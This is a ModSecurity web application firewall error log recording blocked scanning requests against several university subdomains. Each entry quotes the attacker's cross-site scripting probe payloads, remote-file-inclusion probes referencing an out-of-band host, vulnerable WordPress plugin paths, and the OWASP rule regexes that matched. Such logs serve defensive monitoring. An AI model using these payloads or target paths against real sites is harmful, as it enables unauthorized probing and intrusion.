[Tue Aug 29 11:56:04.538419 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16ZMCo-f0AAAq@seAAAAAM"]
[Tue Aug 29 11:56:04.560731 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZMCo-f0AAAqY6PgAAAAr"]
[Tue Aug 29 11:56:04.562806 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZMCo-f0AAArB1vUAAAAV"]
[Tue Aug 29 11:56:04.595558 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZMCo-f0AAAqSw5kAAAAN"]
[Tue Aug 29 11:56:04.597145 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZMCo-f0AAAqeFh0AAAAx"]
[Tue Aug 29 11:56:04.617073 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZMCo-f0AAAqeFh4AAAAx"]
[Tue Aug 29 11:56:04.617154 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZMCo-f0AAAqSw5oAAAAN"]
[Tue Aug 29 11:56:04.622188 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16ZMCo-f0AAApa-SIAAAAg"]
[Tue Aug 29 11:56:04.623616 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZMCo-f0AAAqY6PkAAAAr"]
[Tue Aug 29 11:56:04.644146 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZMCo-f0AAArB1vcAAAAV"]
[Tue Aug 29 11:56:04.659282 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16ZMCo-f0AAAq@seIAAAAM"]
[Tue Aug 29 11:56:04.670450 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16ZMCo-f0AAArB1vgAAAAV"]
[Tue Aug 29 11:56:04.690776 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:cat_id: 6\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO16ZMCo-f0AAAqY6PwAAAAr"]
[Tue Aug 29 11:56:04.703449 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:sortBy. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:sortBy: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ajax.php"] [unique_id "ZO16ZMCo-f0AAAq@seQAAAAM"]
[Tue Aug 29 11:56:04.716966 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZMCo-f0AAAqSw50AAAAN"]
[Tue Aug 29 11:56:04.745142 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZMCo-f0AAAq@seYAAAAM"]
[Tue Aug 29 11:56:04.751314 2023] [:error] [pid 2712] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)([\\\\s\\"'`;\\\\/0-9\\\\=]+on\\\\w+\\\\s*=)" at ARGS:urls[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_xss_attacks.conf"] [line "21"] [id "973337"] [rev "1"] [msg "XSS Filter - Category 2: Event Handler Vector"] [data "Matched Data:  onerror= found within ARGS:urls[]: <img src=x onerror=alert(document.domain)>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "1"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A2"] [tag "OWASP_AppSensor/IE1"] [tag "PCI/6.5.1"] [hostname "www.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO16ZMCo-f0AAAqY6P8AAAAr"]
[Tue Aug 29 11:56:05.543892 2023] [:error] [pid 2650] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:snum. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:snum: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/featurific-for-wordpress/cached_image.php"] [unique_id "ZO16ZcCo-f0AAApa-SQAAAAg"]
[Tue Aug 29 11:56:05.579444 2023] [:error] [pid 2706] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://interact.sh found within TX:1: interact.sh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/sap/public/bc/icf/logoff"] [unique_id "ZO16ZcCo-f0AAAqSw6EAAAAN"]
[Tue Aug 29 11:56:05.579603 2023] [:error] [pid 2754] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZcCo-f0AAArC7e4AAAAW"]
[Tue Aug 29 11:56:05.582394 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZcCo-f0AAArB1v4AAAAV"]
[Tue Aug 29 11:56:05.640571 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:page: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/simpel-reserveren/edit.php"] [unique_id "ZO16ZcCo-f0AAArB1v8AAAAV"]
[Tue Aug 29 11:56:05.677350 2023] [:error] [pid 2753] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZcCo-f0AAArB1wAAAAAV"]
[Tue Aug 29 11:56:05.684704 2023] [:error] [pid 2750] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZcCo-f0AAAq@sesAAAAM"]
[Tue Aug 29 11:56:05.697723 2023] [:error] [pid 2718] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:ID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:ID: 1</script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php"] [unique_id "ZO16ZcCo-f0AAAqeFioAAAAx"]
